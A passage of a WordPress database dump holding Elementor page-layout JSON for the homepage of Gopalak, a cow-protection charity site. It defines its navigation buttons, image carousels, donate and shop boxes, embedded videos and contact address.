Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11062,1840,'_elementor_page_assets','a:0:{}'),(11064,1841,'_elementor_edit_mode','builder'),(11065,1841,'_elementor_template_type','wp-page'),(11066,1841,'_elementor_version','3.7.8'),(11067,1841,'_wp_page_template','elementor_canvas'),(11068,1841,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vi